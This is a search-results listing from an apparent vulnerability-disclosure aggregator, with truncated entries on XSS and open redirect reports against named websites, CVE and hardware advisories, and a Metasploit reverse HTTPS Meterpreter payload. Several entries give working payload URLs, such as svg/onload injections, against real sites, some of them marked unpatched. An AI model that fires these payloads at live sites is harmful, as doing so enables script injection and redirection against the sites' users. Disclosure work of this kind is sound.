7687 matches found
pelc.se XSS vulnerability
Vulnerable URL: http://pelc.se/requestXaX404/"';-- Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:| No Check pelc.se...
visitdelaware.com XSS vulnerability
Vulnerable URL: http://www.visitdelaware.com/plugins/crm/track/?key=442=https://www.xssposed.org Details: Description| Value ---|--- Patched:| Yes, at 31.05.2016 Latest check for patch:| 31.05.2016 20:04 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 509783...
muse.dyu.edu.tw vulnerability
Vulnerable URL: http://muse.dyu.edu.tw:8080/1cate/linker?template=slinks:redirect=1473-6357id==openly=jsCate=https://www.xssposed.org Details: Description| Value ---|--- Patched:| Yes, at 21.12.2015 Latest check for patch:| 21.12.2015 16:07 GMT Vulnerability status:| Publicly disclosed Alexa Rank...
secure.hotair.co.uk XSS vulnerability
Vulnerable URL: https://secure.hotair.co.uk/inflightphotophoto.asp?ph=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 10:01 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Ale...
kyrkotorget.se XSS vulnerability
Vulnerable URL: http://kyrkotorget.se/index.php/"';--/?p=loggaIn.php Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:|...
goletsgo.com Open Redirect vulnerability
Vulnerable URL: http://www.goletsgo.com/RedirectURL.asp?url=https://www.xssposed.org/ Details: Description| Value ---|--- Patched:| Yes, at 20.12.2015 Latest check for patch:| 20.12.2015 11:32 GMT Vulnerability type:| Open Redirect Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / N...
readinglists.nottingham.ac.uk vulnerability
Vulnerable URL: http://readinglists.nottingham.ac.uk/link?url=https://www.xssposed.org/ Details: Description| Value ---|--- Patched:| Yes, at 21.12.2015 Latest check for patch:| 21.12.2015 18:50 GMT Vulnerability status:| Publicly disclosed Alexa Rank| 19213 Google Pagerank| 0 VIP website status:...
Millions of IoT Devices Using Same Hard-Coded CRYPTO Keys
Millions of embedded devices, including home routers, modems, IP cameras, and VoIP phones, are sharing the same hard-coded SSH (Secure Shell) cryptographic keys or HTTPS (HTTP Secure) server certificates that expose them to various types of malicious attacks. A new analysis by IT security consultancy SE...
Windows Meterpreter Shell, Reverse HTTPS Inline
Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 178780 include Msf::Payload::TransportConf...
Sniffly - Sniffing Browser History Using HSTS + CSP.
Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome. More info available in my ToorCon 2015 slides:...
leeward.hawaii.edu XSS vulnerability
Vulnerable URL: http://www.leeward.hawaii.edu/files/gallery/explorecampus/simpleviewer.swf?xmlDataPath=http://45.55.162.179/vuln.xml Details: Description| Value ---|--- Patched:| Yes, at 17.12.2015 Latest check for patch:| 17.12.2015 06:25 GMT Vulnerability type:| XSS Vulnerability status:|...
Dell Computers Contain CA Root Certificate Vulnerability
Dell personal computers using the preinstalled certificate authority (CA) root certificate (eDellRoot) contain a critical vulnerability. Exploitation of the vulnerability could allow a remote attacker to read encrypted web browser traffic (HTTPS), impersonate (spoof) any website, or perform other attacks...
Huawei HG253s V2 Information Disclosure
Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the Spanish customers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration...
Dell eDellRoot / DSDTestProvider Root CA Certificates Installed
The remote Windows host is affected by a man-in-the-middle (MitM) vulnerability due to the installation of a non-authorized root CA certificate into the Windows trusted system certificate store. The private keys for many of these root CAs are publicly known. Furthermore, websites that use specially...
Cisco Mobility Service Engine Web Interface Detection
This script performs HTTP(s) based detection of Cisco Mobility Service Engine. SPDX-FileCopyrightText: 2015 Greenbone AG. Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description...
Cisco FireSIGHT Management Center Certificate Validation Vulnerability
A vulnerability in the rule update functionality of Cisco FireSIGHT Management Center (MC) could allow an unauthenticated, remote attacker to manipulate the content of the rule update packages and execute arbitrary code on the system. The vulnerability is due to lack of certificate validation durin...
littlemissdelicious.com XSS vulnerability
Vulnerable URL: http://www.littlemissdelicious.com/shop/search.php?q=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSSPOSED%2F%29%3E=Search Details: Description| Value ---|--- Patched:| Yes, at 06.12.2015 Latest check for patch:| 06.12.2015 07:25 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...
Session fixation
IBM DataPower Gateway appliances with firmware 6.x before 6.0.0.17, 6.0.1.x before 6.0.1.17, 7.x before 7.0.0.10, 7.1.0.x before 7.1.0.7, and 7.2.x before 7.2.0.1 do not set the secure flag for unspecified cookies in an https session, which makes it easier for remote attackers to capture these...
CVE-2015-7427
IBM DataPower Gateway appliances with firmware 6.x before 6.0.0.17, 6.0.1.x before 6.0.1.17, 7.x before 7.0.0.10, 7.1.0.x before 7.1.0.7, and 7.2.x before 7.2.0.1 do not set the secure flag for unspecified cookies in an https session, which makes it easier for remote attackers to capture these...
pantbanken.se XSS vulnerability
Vulnerable URL: https://www.pantbanken.se/auktioner/visa-auktionsvara/?fid="';-- Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 533931 Google Pagerank| 3 VIP website status:| No...